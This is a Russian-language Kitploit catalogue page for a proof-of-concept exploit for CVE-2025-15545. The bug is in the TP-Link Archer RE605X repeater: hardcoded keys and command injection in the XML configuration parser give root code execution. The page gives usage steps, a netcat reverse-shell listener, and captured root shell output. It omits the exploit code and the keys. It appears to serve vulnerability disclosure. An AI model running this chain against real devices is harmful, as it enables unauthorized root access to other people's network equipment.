Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-15545 — Доказательство концепции для CVE-2025-15545 | Kitploit
Инструменты/GitHubGitHub/xernary/cve-2025-15545
Безопасность встроенных системБезопасность IoTАнализ уязвимостейЭксплуатацияОбратная инженерияКомандование и Управление
GitHubxernary/cve-2025-15545

CVE-2025-15545

Доказательство концепции для CVE-2025-15545

Репозиторий
127 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2025-15545

Информация

Производитель: TP-Link
Веб-сайт производителя: TP-Link
Модель: Archer RE605X
Версия оборудования: RE605X v3.0
Версия прошивки: RE605X(EU)_V3_1.1.5 Build 20240905
Адрес загрузки прошивки: TP-Link

Цепочка уязвимостей, включающая использование жёстко заданных криптографических ключей и внедрение команд в компоненте парсера XML-конфигурации, позволяет локальному аутентифицированному злоумышленнику добиться удалённого выполнения кода (RCE) с правами root на устройстве.

Требования к PoC

Примечание: Подтверждающая концепцию программа exploit.py демонстрирует сценарий цепной атаки и зависит от учётных данных аутентифицированного пользователя как дополнительного предварительного условия. Этот этап аутентификации не покрывается CVE-2025-15545 и включён только для демонстрации.

  • И злоумышленник, и жертва должны быть подключены к локальной сети повторителя.
  • Жертва должна быть аутентифицирована на веб-панели управления повторителем.

Использование

Прослушивайте входящие соединения в отдельном терминале:

root@kitploit:~
$ nc -lvnp 4444

Выполните скрипт exploit.py:

root@kitploit:~
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>

Примечание: aes_key и aes_iv — это жёстко заданные криптографические ключи, используемые устройством для шифрования и дешифрования файлов конфигурации, и они требуются для данной подтверждающей концепцию. По соображениям безопасности они не могут быть здесь раскрыты.

Реверс-шелл принимается на первом терминале:

root@kitploit:~
$ nc -lvnp 4444

Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt

Ссылки

Эти уязвимости были сообщены Nicola Giuffrida.

  • Полное описание: https://nico-security.com/posts/cve-2025-15545
  • Запись CVE: https://www.cve.org/cverecord?id=CVE-2025-15545
  • Рекомендация TP-Link: https://www.tp-link.com/us/support/faq/4929
Скачать инструмент